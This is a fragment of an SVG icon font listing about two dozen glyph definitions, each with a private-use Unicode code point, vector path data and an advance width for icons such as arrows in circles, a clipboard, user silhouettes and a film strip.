<glyph unicode="&#xe697;" d="M216.555 189.514l250.438-1.902-14.39 14.466c-1.067 1.067-106.788 104.5-248.242 5.35l-44.877 65.916c5.689 4.728 10.606 10.597 14.31 17.534 15.276 28.639 4.441 64.216-24.178 79.484-28.636 15.276-64.22 4.454-79.48-24.176-15.276-28.626-4.459-64.207 24.177-79.488 16.374-8.728 34.994-8.892 50.829-2.114l39.518-58.042-67.597 0.51c-2.228 18.406-13.064 35.46-30.651 44.841-28.636 15.272-64.204 4.446-79.48-24.19-15.277-28.618-4.458-64.202 24.177-79.479 28.619-15.26 64.22-4.442 79.48 24.178 3.082 5.755 5.032 11.786 6.066 17.866l78.464-0.591c-1.904-41.96 5.671-75.399 18.078-102.18h-28.57v-16.784h50.352v8.392h1.049c-0.361 0.606-0.689 1.279-1.049 1.902v6.49h-3.572c-10.802 21.021-18.358 46.993-19.653 79.226l53.958-79.226h-13.95v-16.784h50.354v16.784h-16.113l-69.448 102.019zM406.591 214.396c6.096-3.262 11.442-6.565 15.982-9.673l-189.201 1.452c75.792 44.124 137.373 27.332 173.219 8.221zM102.212 281.508c-20.406 10.891-28.16 36.362-17.276 56.77 10.884 20.414 36.355 28.168 56.778 17.276 20.406-10.884 28.16-36.356 17.26-56.774-10.884-20.416-36.355-28.16-56.761-17.272zM95.786 180.301c-10.884-20.406-36.355-28.144-56.778-17.26-20.407 10.882-28.16 36.354-17.276 56.762 10.9 20.419 36.355 28.168 56.779 17.276 20.407-10.887 28.159-36.356 17.276-56.779zM117.488 87.496h50.353v-16.784h-50.353v16.784zM318.9 87.496h50.353v-16.784h-50.353v16.784zM50.35 87.496h50.353v-16.784h-50.353v16.784zM386.038 87.496h50.351v-16.784h-50.351v16.784z" horiz-adv-x="467" />
<glyph unicode="&#xe698;" d="M209.804 299.529c-38.862 0-70.858-29.372-75.038-67.137h-17.276v-16.784h17.276c4.18-37.764 36.174-67.138 75.038-67.138 41.716 0 75.53 33.815 75.53 75.53s-33.814 75.53-75.53 75.53zM209.804 165.255c-29.536 0-53.975 21.93-58.072 50.353h58.072v16.785h-58.072c4.097 28.422 28.538 50.352 58.072 50.352 32.389 0 58.744-26.356 58.744-58.745s-26.356-58.745-58.745-58.745zM50.353 147.421v50.353h-16.784v-67.137h16.784zM50.353 265.961v50.353h-16.784v-67.137h16.784zM67.138 366.666v-285.336h285.334v285.336h-285.334zM335.688 98.118h-251.766v251.766h251.766v-251.766h0zM0.001 417.020v-386.041h419.608v386.041h-419.608zM402.825 47.764h-386.041v352.472h386.042v-352.472h-0.002z" horiz-adv-x="420" />
<glyph unicode="&#xe699;" d="M209.766 14.195c115.884 0 209.804 93.936 209.804 209.805s-93.921 209.804-209.804 209.804c-115.868 0-209.804-93.936-209.804-209.804s93.938-209.804 209.804-209.804zM209.766 417.020c106.427 0 193.022-86.594 193.022-193.020 0-106.435-86.594-193.020-193.020-193.020-106.442 0-193.020 86.586-193.020 193.020-0 106.427 86.576 193.020 193.019 193.020zM222.5 133.8l11.868-11.866 102.050 102.067-102.050 102.058-11.868-11.868 81.792-81.798h-203.626v-16.784h203.626z" horiz-adv-x="420" />
<glyph unicode="&#xe69a;" d="M300.87 184.695l-132.29-132.292-0.065 0.084c-0.492-0.51-0.904-1.067-1.41-1.558-34.356-34.354-90.264-34.354-124.621 0-33.355 33.356-34.224 86.957-2.819 121.49l17.654-17.637 27.88 27.865c37.421-17.849 83.544-11.392 114.541 19.603l47.487 47.472 11.867-11.868 11.868 11.868-47.486 47.468 71.217 71.211-11.868 11.867-71.219-71.21-47.469 47.476 71.202 71.211-11.85 11.875-71.22-71.219-47.466 47.476-11.868-11.867 11.868-11.868-47.486-47.476c-30.996-30.995-37.454-77.119-19.587-114.548l-27.881-27.869 17.948-17.964c-37.946-41.092-37.077-105.327 2.82-145.224 40.895-40.912 107.459-40.912 148.354 0l133.768 133.767c29.306 29.308 77.004 29.308 106.327 0l11.868 11.868c-35.863 35.851-94.216 35.851-130.064-0zM69.186 332.799l47.484 47.469 118.671-118.68-47.468-47.471c-32.718-32.718-85.956-32.718-118.688 0-32.717 32.719-32.717 85.957-0.001 118.682zM46.517 215.18c3.228-4.522 6.752-8.884 10.801-12.932 4.065-4.064 8.424-7.589 12.932-10.8l-12.932-12.932-23.734 23.735 12.934 12.93z" horiz-adv-x="431" />
<glyph unicode="&#xe69b;" d="M0 315.462l8.081-5.752c1.427-1.017 14.72-9.934 41.666-9.934 4.328 0 8.802 0.246 13.374 0.705 60.025-69.53 102.574-119.556 112.966-132.783-19.636-43.764-22.718-92.921-8.589-138.98l4.097-13.342 122.081 122.096 132.948-132.947 11.866 11.868-132.947 132.948 122.097 122.096-13.342 4.082c-45.272 13.882-95.772 10.75-138.98-8.59-13.195 10.375-63.072 52.795-132.472 112.706 1.754 10.704 3.688 34.93-9.196 55.058l-5.638 8.786-128.012-128.016zM27.668 319.38l96.511 96.526c6.162-17.948 1.442-37.109 1.376-37.339l-1.278-5.032 3.916-3.425c118.54-102.363 138.095-118.246 143.864-120.737l-0.034-0.097 3.115-0.934 2.967 1.393c36.11 17.261 78.447 22.046 117.49 13.375l-215.704-215.69c-8.802 39.519-4.197 80.726 13.391 117.474l1.672 3.491-1.571 3.541-0.492-0.212c-5.148 10.113-29.291 38.074-119.966 143.108l-2.966 3.442-4.508-0.607c-5.41-0.721-10.687-1.098-15.703-1.098-9.524-0.002-16.85 1.326-22.080 2.817z" horiz-adv-x="439" />
<glyph unicode="&#xe69c;" d="M33.574 385.55c20.948 20.947 48.796 32.486 78.431 32.486v0c29.633 0 57.483-11.539 78.43-32.486l224.558-224.572c29.913-29.914 29.913-78.612 0-108.526-14.49-14.506-33.767-22.486-54.272-22.486-20.504 0-39.78 7.982-54.268 22.486l-99.151 99.134 0.082 0.080-118.507 118.524c-8.047 8.032-12.474 18.736-12.474 30.094 0 11.375 4.426 22.062 12.474 30.11 8.032 8.031 18.718 12.474 30.094 12.474 11.375 0 22.063-4.442 30.095-12.474l189.938-189.922-11.868-11.868-189.94 189.922c-9.736 9.736-26.716 9.736-36.453 0-4.868-4.868-7.556-11.342-7.556-18.242 0-6.885 2.688-13.36 7.556-18.228l217.574-217.738c11.324-11.342 26.374-17.57 42.403-17.57 16.014 0 31.078 6.229 42.404 17.57 23.374 23.375 23.374 61.416 0 84.792l-224.555 224.572c-17.786 17.784-41.42 27.569-66.564 27.569-25.144 0-48.78-9.785-66.564-27.569s-27.586-41.42-27.586-66.564c0-25.144 9.802-48.796 27.586-66.582l196.823-196.821-11.868-11.868-196.822 196.825c-20.964 20.964-32.504 48.812-32.504 78.447s11.54 57.483 32.504 78.432z" horiz-adv-x="439" />
<glyph unicode="&#xe69d;" d="M100.707 253.373h201.413v-16.784h-201.412v16.784zM100.707 186.236h201.413v-16.784h-201.412v16.784zM100.707 119.090h134.274v-16.786h-134.274v16.786zM251.012 421.216c-4 23.804-24.654 41.962-49.599 41.962-24.939 0-45.593-18.158-49.598-41.962h-151.816v-436.394h402.824v436.394h-151.811zM167.845 382.685v30.139c0 18.51 15.063 33.57 33.57 33.57 18.514 0 33.57-15.060 33.57-33.57v-30.142l8.488-4.827c16.482-9.38 29.119-23.636 36.372-40.56h-156.845c7.251 16.928 19.889 31.18 36.372 40.56l8.474 4.832zM386.040 1.606h-369.256v402.825h134.275v-11.989c-26.201-14.916-45.19-41.064-50.352-71.932h201.412c-5.148 30.872-24.144 57.015-50.352 71.932v11.989h134.274v-402.825z" horiz-adv-x="403" />
<glyph unicode="&#xe69e;" d="M327.296 190.432v41.972h-117.49v25.172h75.53v167.824h-167.844v-167.824h75.53v-25.172h-117.492v-41.973h-75.53v-167.836h167.843v167.836h-75.528v25.192h218.197v-25.192h-75.53v-167.837h167.846v167.837h-75.531zM134.274 408.616h134.276v-134.255h-134.276v134.255zM151.058 39.38h-134.274v134.267h134.275l-0.001-134.267zM386.040 39.38h-134.274v134.267h134.274v-134.267z" horiz-adv-x="403" />
<glyph unicode="&#xe69f;" d="M388.795 406.53l-11.868 11.868-114.279-114.294v93.15l-122.998-98.035h-95.182v-75.882l-0.050-0.041 0.050-0.048v-75.088h62.22l-106.689-106.688 11.867-11.868 118.556 118.556h0.426l16.047 16.039-0.246 0.188 99.231 99.231v-0.427l16.786 16.785v0.426l126.128 126.129zM61.252 164.943v117.49h84.282l100.329 79.972v-63.188l0.016-11.884-122.407-122.391h-62.22zM245.882 164.943h-0.018v-78.414l-85.675 67.236-11.95-11.957 114.409-89.782v96.132h0.017v108.082l-16.784-16.785z" horiz-adv-x="389" />
<glyph unicode="&#xe6a0;" d="M217.721 275.48c10.226 24.312 42.433 102.128 42.433 118.625v64.876h-218.195v-64.875c0-16.538 31.995-94.83 41.978-118.851-49.699-24.734-83.939-75.889-83.939-135.176 0-83.43 67.628-151.060 151.060-151.060 83.43 0 151.060 67.628 151.060 151.060-0 59.464-34.454 110.762-84.397 135.401zM58.744 394.106v48.091h83.626v-114.827h16.784v114.827h84.219v-48.091c0-9.2-20.588-63.36-41.108-112.062-16.014 5.778-33.208 9.089-51.206 9.089-18.178 0-35.535-3.381-51.68-9.268-17.44 41.978-40.634 102.12-40.634 112.242zM151.059 5.803c-74.038 0-134.275 60.236-134.275 134.276 0 74.038 60.237 134.27 134.275 134.27 74.038 0 134.275-60.234 134.275-134.27 0-74.038-60.238-134.276-134.275-134.276zM151.059 240.78c-55.614 0-100.707-45.087-100.707-100.701 0-55.625 45.092-100.708 100.707-100.708 55.631 0 100.706 45.084 100.706 100.708-0 55.615-45.076 100.702-100.706 100.702zM151.059 56.156c-46.272 0-83.922 37.651-83.922 83.923 0 46.271 37.65 83.916 83.922 83.916 46.288 0 83.922-37.646 83.922-83.916 0-46.272-37.634-83.923-83.923-83.923z" horiz-adv-x="302" />
<glyph unicode="&#xe6a1;" d="M436.394 229.794c0 20.612-16.325 36.511-37.98 36.511h-136.57c8.721 20.234 24.39 62.704 24.39 106.541 0 50.042-25.111 60.544-46.175 60.544-13.064 0-31.928-9.896-31.928-27.79 0-7.548-1.196-74.731-42.222-109.152-43.716-36.666-56.139-46.255-80.087-46.255-27.93 0-77.546-0.614-77.546-0.614l-8.277-0.106v-195.299h91.396c5.933 0 23.734-7.932 39.453-14.916 25.947-11.556 55.336-24.652 75.137-24.652l131.995 0.050c21.488 0 38.98 16.899 38.98 37.666 0 8.458-3.017 16.195-7.902 22.486 15.752 4.507 27.375 18.882 27.375 36.060 0 8.63-3.033 16.498-7.933 22.868 15.49 4.95 26.832 19.317 26.832 36.435 0 8.606-2.95 16.49-7.752 22.9 16.503 4.13 28.815 18.964 28.815 36.724zM398.416 208.608h-29.159v-16.784h7.638c11.932 0 21.652-9.712 21.652-21.652 0-11.932-9.72-21.644-21.652-21.644h-24.423v-16.786h6.312c11.507 0 20.866-9.368 20.866-20.875 0-11.522-9.36-20.88-20.866-20.88h-23.092v-16.786h2.292c12.23 0 22.194-9.375 22.194-20.88 0-11.522-9.964-20.882-22.194-20.882h-21.438v-0.050h-110.558c-16.227 0-45.108 12.868-68.319 23.193-22.799 10.146-37.224 16.375-46.272 16.375h-74.611v161.935c15.276 0.172 48.206 0.516 69.040 0.516 31.043 0 47.336 13.671 90.871 50.18 45.894 38.495 48.221 108.39 48.221 122.012 0 6.848 10.508 11.006 15.146 11.006 8.787 0 29.388 0 29.388-43.76 0-55.303-27.912-110.558-28.191-111.115l-6.244-12.21h102.82c0.296-0.214 0.476 0 0.476 0h60.106c12.277 0 21.192-8.507 21.192-19.727-0.002-11.68-9.509-21.187-21.195-21.187z" horiz-adv-x="437" />
<glyph unicode="&#xe6a2;" d="M209.82 433.8c-115.884 0-209.82-93.933-209.82-209.8s93.936-209.804 209.82-209.804c115.868 0 209.79 93.937 209.79 209.804s-93.921 209.801-209.79 209.801zM209.82 30.979c-106.442 0-193.036 86.594-193.036 193.021 0 106.43 86.594 193.016 193.036 193.016 106.428 0 193.006-86.585 193.006-193.016-0-106.428-86.579-193.020-193.006-193.020zM197.084 314.196l-11.865 11.867-102.066-102.062 102.066-102.066 11.865 11.866-81.806 81.808h203.624v16.785h-203.624z" horiz-adv-x="420" />
<glyph unicode="&#xe6a3;" d="M109.099 383.452h16.784v-67.138h-16.784v67.138zM234.982 333.099c0 64.892-52.615 117.49-117.49 117.49-64.892 0-117.492-52.599-117.492-117.49 0-49.976 31.259-92.56 75.268-109.541v-226.147h83.922v58.483l25.438 25.438-25.438 25.438v33.043l42.222 42.224-41.567 41.57c43.928 17.014 75.138 59.565 75.138 109.492zM153.78 239.26l-11.375-4.393v-17.556l35.256-35.274-35.257-35.272v-46.944l18.472-18.49-18.472-18.488v-48.649h-50.354v220.884l-10.752 4.148c-39.191 15.113-64.514 51.959-64.514 93.872 0 55.532 45.174 100.706 100.707 100.706 55.516 0 100.708-45.173 100.708-100.706-0-41.863-25.292-78.694-64.418-93.839z" horiz-adv-x="235" />
<glyph unicode="&#xe6a4;" d="M348.161 276.394c-32.041 0-65.513-28.962-104.786-33.077v16.736c0.23 41.108 31.029 83.48 82.495 83.48h9.752c47.354 0 96.052 37.486 101.248 100.706h-16.802c-5.031-52.73-45.288-83.922-84.447-83.922h-9.752c-60.892 0-98.704-51.534-99.246-99.658h-0.032v-0.639c0-0.131-0.017-0.279-0.017-0.41h0.017v-16.292c-39.256 4.114-72.744 33.078-104.772 33.078-34.502 0-121.817-68.431-121.817-202.56 0-67.924 45.846-70.070 51.681-70.070 0.394 0 0.606 0 0.606 0 28.471 0 54.746 13.687 87.594 46.536 32.847 32.847 45.976 41.469 69.793 41.469 9.489 0 20.899 0 24.636 0 0.786 0 1.361 0 1.361 0 3.736 0 15.146 0 24.636 0 23.818 0 36.945-8.623 69.792-41.469 32.847-32.847 59.125-46.536 87.596-46.536 0 0 0.209 0 0.604 0 5.82 0 51.664 2.149 51.664 70.070 0 134.126-87.313 202.56-121.802 202.56zM418.479 20.53l-0.394 0.017h-0.394c-23.899 0-46.55 12.44-75.728 41.617-32.24 32.24-49.712 46.387-81.659 46.387h-50.632c-31.946 0-49.418-14.146-81.661-46.387-29.176-29.176-51.828-41.616-75.726-41.616l0.032 0.048-0.639-0.048c-8.195 0-34.897 3.836-34.897 53.286 0 128.161 83.48 185.776 105.034 185.776 12.669 0 27.702-6.754 43.616-13.899 20.308-9.114 43.32-19.458 69.694-19.671 26.096 0.214 49.106 10.556 69.416 19.671 15.914 7.146 30.945 13.899 43.615 13.899 21.541 0 105.018-57.615 105.018-185.776 0.002-49.45-26.697-53.286-34.697-53.303zM134.343 209.257h-16.786v-33.57h-33.569v-16.784h33.569v-33.568h16.786v33.568h33.566v16.784h-33.566zM310.512 192.521c-13.9 0-25.178-11.262-25.178-25.178 0-13.899 11.277-25.176 25.178-25.176 13.916 0 25.176 11.277 25.176 25.176 0 13.918-11.26 25.178-25.176 25.178zM310.512 158.952c-4.623 0-8.392 3.769-8.392 8.392 0 4.639 3.769 8.394 8.392 8.394 4.638 0 8.392-3.755 8.392-8.394 0-4.623-3.754-8.392-8.392-8.392zM377.65 175.736c-13.901 0-25.178-11.262-25.178-25.178 0-13.901 11.276-25.176 25.178-25.176 13.916 0 25.176 11.276 25.176 25.176 0 13.918-11.26 25.178-25.176 25.178zM377.65 142.168c-4.624 0-8.394 3.77-8.394 8.392 0 4.638 3.769 8.392 8.394 8.392 4.638 0 8.39-3.754 8.39-8.392 0-4.623-3.752-8.392-8.39-8.392z" horiz-adv-x="470" />
<glyph unicode="&#xe6a5;" d="M0 400.236v-352.472h419.61v352.472h-419.61zM67.138 64.548h-50.353v67.137h50.353v-67.137zM67.138 148.47h-50.353v67.138h50.353v-67.138zM67.138 232.388h-50.353v67.138h50.353v-67.137zM67.138 316.31h-50.353v67.138h50.353v-67.138zM335.688 288.339v-223.791h-251.764v318.899h251.764v-95.108zM402.825 64.548h-50.353v67.137h50.353v-67.137zM402.825 148.47h-50.353v67.138h50.353v-67.138zM402.825 232.388h-50.353v67.138h50.353v-67.137zM402.825 316.31h-50.353v67.138h50.353v-67.138zM167.845 291.838v-135.664l117.489 67.822-117.49 67.842zM184.629 262.76l67.138-38.764-67.138-38.762v77.525z" horiz-adv-x="420" />
<glyph unicode="&#xe6a6;" d="M209.804 182.055c23.179 0 41.962 18.784 41.962 41.948 0 23.178-18.785 41.953-41.962 41.953-23.168 0-41.96-18.774-41.96-41.952-0-23.164 18.791-41.949 41.96-41.949zM209.804 249.173c13.882 0 25.178-11.292 25.178-25.168 0-13.87-11.293-25.164-25.178-25.164s-25.177 11.293-25.177 25.165c0 13.875 11.293 25.168 25.177 25.168zM417.945 197.971c1.058 8.539 1.663 17.209 1.663 26.032 0 115.876-93.93 209.804-209.794 209.804v0c-0.010 0-0.010 0-0.010 0-79.57 0-148.79-44.297-184.358-109.573-0.032-0.074-0.082-0.148-0.122-0.221-0.672-1.23-1.278-2.508-1.926-3.754-2.466-4.769-4.803-9.613-6.909-14.587-0.32-0.754-0.598-1.524-0.902-2.287-10.023-24.496-15.588-51.279-15.588-79.381 0-115.872 93.93-209.808 209.805-209.808 104.248 0 190.692 76.055 206.993 175.68 0.443 2.686 0.812 5.39 1.147 8.094zM402.456 212.608c-0.067-1.148-0.173-2.296-0.264-3.426-0.197-2.673-0.452-5.344-0.764-7.984-0.149-1.229-0.303-2.474-0.466-3.704-0.377-2.721-0.82-5.409-1.312-8.098-0.172-0.983-0.328-1.964-0.524-2.95-0.73-3.673-1.541-7.327-2.474-10.932-0.010-0.034-0.017-0.050-0.034-0.082-0.918-3.557-1.966-7.048-3.080-10.508-0.279-0.884-0.592-1.754-0.894-2.639-0.902-2.673-1.86-5.312-2.876-7.918-0.352-0.918-0.712-1.836-1.082-2.753-1.148-2.82-2.352-5.589-3.623-8.326-0.256-0.572-0.5-1.148-0.764-1.705-1.615-3.409-3.32-6.769-5.13-10.064l-100.476 60.68c4.442 9.638 6.99 20.325 6.99 31.63 0 41.805-33.898 75.702-75.709 75.702-0.024 0-0.048-0.008-0.083-0.008-0.032 0-0.065 0.008-0.089 0.008-0.294 0-0.582-0.050-0.876-0.058-2.51-0.032-4.984-0.172-7.426-0.442-0.262-0.032-0.514-0.090-0.779-0.123-14.268-1.745-27.298-7.434-37.978-15.982l-83.287 83.293c16.719 15.342 36.159 27.75 57.484 36.478v-0.008c11.236 4.597 22.996 8.18 35.159 10.613 0.172 0.033 0.351 0.058 0.524 0.090 2.851 0.562 5.72 1.069 8.613 1.504 0.631 0.094 1.27 0.152 1.91 0.242 2.458 0.344 4.932 0.672 7.424 0.922 1.293 0.13 2.623 0.196 3.933 0.299 1.861 0.148 3.713 0.324 5.59 0.418 3.097 0.156 6.22 0.23 9.359 0.238 0.114 0 0.236 0.008 0.361 0.008 96.445 0 176.603-71.112 190.784-163.664 1.467-9.572 2.229-19.382 2.229-29.356-0.002-3.828-0.14-7.627-0.37-11.396zM357.224 99.608c-2.072-2.459-4.204-4.851-6.382-7.195-0.394-0.409-0.795-0.82-1.188-1.23-1.992-2.098-4.026-4.163-6.106-6.163-0.466-0.442-0.934-0.885-1.409-1.327-2.123-2.016-4.293-3.966-6.507-5.868-0.394-0.346-0.795-0.707-1.197-1.048-2.533-2.148-5.114-4.228-7.745-6.244-0.082-0.050-0.154-0.115-0.236-0.18-5.688-4.327-11.622-8.344-17.776-12.031l-55.674 103.245c6.499 4.509 12.211 10.015 17.014 16.276l100.444-60.661c-3.959-5.952-8.245-11.638-12.818-17.098-0.13-0.163-0.278-0.312-0.418-0.474zM272.606 41.536c-2.483-0.868-4.984-1.688-7.507-2.442-0.966-0.293-1.959-0.558-2.934-0.836-2.312-0.654-4.639-1.262-6.982-1.836-1.107-0.262-2.22-0.524-3.336-0.77-2.269-0.509-4.556-0.966-6.859-1.394-1.149-0.212-2.303-0.426-3.458-0.623-2.361-0.394-4.736-0.722-7.123-1.033-1.097-0.132-2.188-0.296-3.286-0.409-2.673-0.296-5.351-0.526-8.047-0.707-0.828-0.048-1.648-0.128-2.476-0.18-3.572-0.196-7.162-0.312-10.786-0.312-103.108 0-187.596 81.25-192.775 183.088-0.172 3.296-0.254 6.594-0.254 9.921 0 3.27 0.090 6.516 0.246 9.744 0.122 2.468 0.336 4.917 0.549 7.36 0.066 0.721 0.099 1.442 0.165 2.148 1.901 18.932 6.572 37.060 13.556 53.992 0.017 0.091 0.041 0.172 0.066 0.254 8.711 21.079 21.038 40.289 36.224 56.852l83.29-83.291c-9.269-11.58-15.17-25.938-16.319-41.625-0.139-1.803-0.286-3.597-0.286-5.434 0-0.025 0.008-0.057 0.008-0.090s-0.008-0.058-0.008-0.082c0-41.81 33.896-75.708 75.701-75.708 9.998 0 19.506 1.985 28.242 5.491l55.696-103.313c-6.197-3-12.58-5.688-19.12-8.032-0.717-0.257-1.464-0.488-2.184-0.733zM268.55 224.004c0-32.393-26.347-58.732-58.745-58.732-32.364 0-58.688 26.291-58.736 58.642 0.048 32.422 26.404 58.778 58.826 58.827 32.348-0.049 58.655-26.374 58.655-58.738z" horiz-adv-x="420" />
<glyph unicode="&#xe6a7;" d="M299.563 131.392c-18.408 7.688-62.139 22.766-89.038 30.708-2.293 0.721-2.654 0.837-2.654 10.382 0 7.884 3.244 15.826 6.408 22.546 3.427 7.302 7.49 19.579 8.95 30.594 4.081 4.737 9.636 14.080 13.21 31.888 3.13 15.695 1.672 21.406-0.41 26.766-0.212 0.566-0.444 1.123-0.607 1.68-0.786 3.679 0.294 22.8 2.984 37.634 1.852 10.178-0.476 31.822-14.489 49.731-8.85 11.317-25.782 25.209-56.71 27.142l-16.965-0.016c-30.404-1.917-47.353-15.809-56.206-27.126-14.014-17.908-16.341-39.552-14.488-49.722 2.704-14.842 3.769-33.962 3-37.568-0.164-0.632-0.394-1.189-0.624-1.754-2.066-5.36-3.54-11.072-0.394-26.766 3.558-17.809 9.114-27.152 13.212-31.888 1.442-11.014 5.508-23.292 8.95-30.594 2.508-5.344 3.688-12.613 3.688-22.89 0-9.548-0.361-9.662-2.508-10.342-27.816-8.212-72.087-24.209-88.594-31.438-13.080-5.615-16.276-15.687-16.276-24.776s0-36.019 0-41.961c0-5.94 3.524-16.088 16.276-16.088 9.802 0 88.282 0 123.931 0 10.686 0 17.57 0 17.57 0h3.066c0 0 7 0 17.833 0 35.797 0 114.163 0 123.95 0 12.736 0 16.276 10.147 16.276 16.088s0 32.874 0 41.961-6.276 20.195-19.339 25.808zM302.020 64.32h-285.236v41.264c0 5.090 1.491 7.368 6.229 9.4 15.883 6.959 59.86 22.819 86.921 30.817 14.228 4.508 14.228 17.127 14.228 26.34 0 12.81-1.672 22.349-5.293 30.046-2.754 5.849-6.278 16.358-7.49 25.619l-0.656 4.99-3.294 3.811c-1.802 2.082-6.326 8.613-9.441 24.206-2.442 12.15-1.361 14.958-0.492 17.214 0.492 1.213 0.951 2.43 1.294 3.786l0.097 0.356 0.067 0.356c1.689 7.918-0.59 31.397-2.903 44.084-1.066 5.839 0.278 22.414 11.212 36.375 6.671 8.548 19.653 19.042 43.534 20.68l15.867 0.017c19.506-1.324 34.322-8.286 44.042-20.702 10.918-13.958 12.244-30.537 11.18-36.397-2.361-13.018-4.59-36.109-2.869-44.132l0.132-0.624 0.18-0.606c0.244-0.856 0.556-1.721 0.884-2.582l0.165-0.414v-0.024c0.951-2.446 2.031-5.216-0.394-17.387-3.13-15.58-7.671-22.141-9.474-24.234l-3.263-3.794-0.654-4.958c-1.231-9.253-4.755-19.792-7.508-25.653-3.95-8.408-8-18.514-8-29.692 0-9.228 0-21.866 14.686-26.479 26.258-7.753 69.514-22.661 87.167-30.038 6.688-2.868 9.18-7.892 9.18-10.384l-0.099-41.262zM372.731 240.554l43.878 43.874-11.882 11.868-43.863-43.875-43.88 43.875-11.866-11.868 43.878-43.875-43.879-43.878 11.866-11.868 43.88 43.874 43.878-43.874 11.866 11.868z" horiz-adv-x="417" />
<glyph unicode="&#xe6a8;" d="M0 224c0-115.884 93.936-209.804 209.805-209.804 115.868 0 209.804 93.921 209.804 209.804 0 115.868-93.936 209.804-209.805 209.804-115.868 0-209.804-93.936-209.804-209.804zM402.825 224c0-106.435-86.594-193.020-193.022-193.020-106.442 0-193.020 86.586-193.020 193.020s86.578 193.020 193.020 193.020c106.428 0 193.022-86.586 193.022-193.020zM119.605 211.264l-11.868-11.866 102.066-102.058 102.052 102.058-11.868 11.866-81.791-81.799v203.634h-16.784v-203.634z" horiz-adv-x="420" />
<glyph unicode="&#xe6a9;" d="M299.562 131.392c-18.406 7.688-62.138 22.766-89.037 30.708-2.293 0.721-2.654 0.837-2.654 10.382 0 7.884 3.246 15.826 6.41 22.546 3.424 7.302 7.488 19.579 8.948 30.594 4.082 4.737 9.639 14.080 13.21 31.888 3.13 15.695 1.672 21.406-0.41 26.766-0.212 0.566-0.44 1.123-0.605 1.68-0.788 3.679 0.293 22.8 2.983 37.634 1.851 10.178-0.476 31.822-14.489 49.731-8.85 11.317-25.782 25.209-56.712 27.142l-16.965-0.016c-30.404-1.917-47.352-15.809-56.204-27.126-14.014-17.908-16.342-39.552-14.489-49.722 2.704-14.842 3.77-33.962 2.999-37.568-0.164-0.632-0.394-1.189-0.623-1.754-2.066-5.36-3.54-11.072-0.394-26.766 3.556-17.809 9.114-27.152 13.212-31.888 1.442-11.014 5.507-23.292 8.95-30.594 2.507-5.344 3.688-12.613 3.688-22.89 0-9.548-0.361-9.662-2.508-10.342-27.816-8.212-72.088-24.209-88.594-31.438-13.082-5.614-16.277-15.686-16.277-24.774s0-36.019 0-41.961c0-5.94 3.524-16.088 16.276-16.088 9.802 0 88.282 0 123.932 0 10.686 0 17.57 0 17.57 0h3.067c0 0 6.999 0 17.834 0 35.798 0 114.162 0 123.95 0 12.736 0 16.276 10.147 16.276 16.088s0 32.874 0 41.961-6.278 20.194-19.341 25.808zM302.021 64.32h-285.236v41.264c0 5.090 1.476 7.368 6.212 9.4 15.899 6.959 59.86 22.819 86.936 30.817 14.228 4.508 14.228 17.127 14.228 26.34 0 12.81-1.689 22.349-5.294 30.046-2.754 5.849-6.278 16.358-7.49 25.619l-0.654 4.99-3.294 3.811c-1.803 2.082-6.328 8.613-9.442 24.206-2.442 12.15-1.361 14.958-0.492 17.214 0.492 1.213 0.934 2.43 1.296 3.786l0.082 0.356 0.082 0.356c1.688 7.918-0.591 31.397-2.903 44.084-1.066 5.839 0.278 22.414 11.195 36.375 6.688 8.548 19.67 19.042 43.55 20.68l15.866 0.017c19.506-1.324 34.322-8.286 44.026-20.702 10.916-13.958 12.262-30.537 11.196-36.397-2.361-13.018-4.59-36.109-2.886-44.132l0.131-0.624 0.18-0.606c0.263-0.856 0.572-1.721 0.903-2.582l0.148-0.414 0.016-0.024c0.952-2.446 2.034-5.216-0.392-17.387-3.131-15.58-7.672-22.141-9.476-24.234l-3.262-3.794-0.672-4.958c-1.214-9.253-4.736-19.792-7.488-25.653-3.952-8.408-7.999-18.514-7.999-29.692 0-9.228 0-21.866 14.684-26.479 26.26-7.753 69.514-22.661 87.168-30.038 6.686-2.868 9.18-7.892 9.18-10.384l-0.099-41.262zM369.256 248.947v66.961h-16.784v-66.961h-66.974v-16.785h66.974v-66.956h16.784v66.957h66.956v16.785z" horiz-adv-x="436" />
<glyph unicode="&#xe6aa;" d="M0 428.8v-409.6h460.8v409.6h-460.8zM17.067 411.733h42.666v-375.466h-42.666v375.466zM443.733 36.267h-366.933v375.466h366.933v-375.466zM264.534 61.866c89.6 0 162.134 72.534 162.134 162.134s-72.534 162.134-162.134 162.134c-89.6 0-162.133-72.534-162.133-162.134s72.534-162.134 162.133-162.134zM264.534 369.067c80.214 0 145.067-64.853 145.067-145.067s-64.853-145.067-145.067-145.067c-80.214 0-145.066 64.853-145.066 145.067s64.853 145.067 145.066 145.067zM264.534 172.8c28.16 0 51.2 23.040 51.2 51.2s-23.040 51.2-51.2 51.2c-28.16 0-51.2-23.040-51.2-51.2s23.040-51.2 51.2-51.2zM264.534 258.134c18.774 0 34.134-15.36 34.134-34.134s-15.36-34.134-34.134-34.134-34.133 15.36-34.133 34.134c0 18.774 15.36 34.134 34.133 34.134zM273.067 224c0-4.713-3.82-8.534-8.534-8.534s-8.534 3.82-8.534 8.534c0 4.713 3.82 8.534 8.534 8.534s8.534-3.821 8.534-8.534z" horiz-adv-x="461" />
<glyph unicode="&#xe6ab;" d="M359.253 358.827l47.786 47.786v-39.253h17.067v68.266h-68.267v-17.067h39.253l-47.786-47.786c-43.52 40.96-100.694 65.707-164.694 65.707-69.974 0-136.534-30.72-182.613-82.774l12.8-11.094c1.707 1.707 3.413 3.413 5.12 5.12l152.747-153.6-57.173-57.173h-42.666l-59.733-59.733h54.614v-54.613l59.733 59.733v42.666l57.173 57.173 152.747-152.746c-1.707-1.707-3.413-3.413-5.12-5.12l11.094-12.8c52.906 46.080 82.774 112.64 82.774 182.613 0.853 64-23.894 122.026-64.853 164.693zM108.374 90.026l-25.6-25.6v30.72h-29.867l25.6 25.6h30.72v-30.72zM29.866 359.68c40.96 38.4 95.573 59.733 152.746 59.733 58.88 0 112.64-23.040 152.747-59.733l-152.746-152.747-152.746 152.746zM347.307 346.88c37.546-40.106 59.733-93.867 59.733-152.746 0-57.173-21.334-110.933-59.733-152.746l-152.746 152.746 152.746 152.746z" horiz-adv-x="425" />
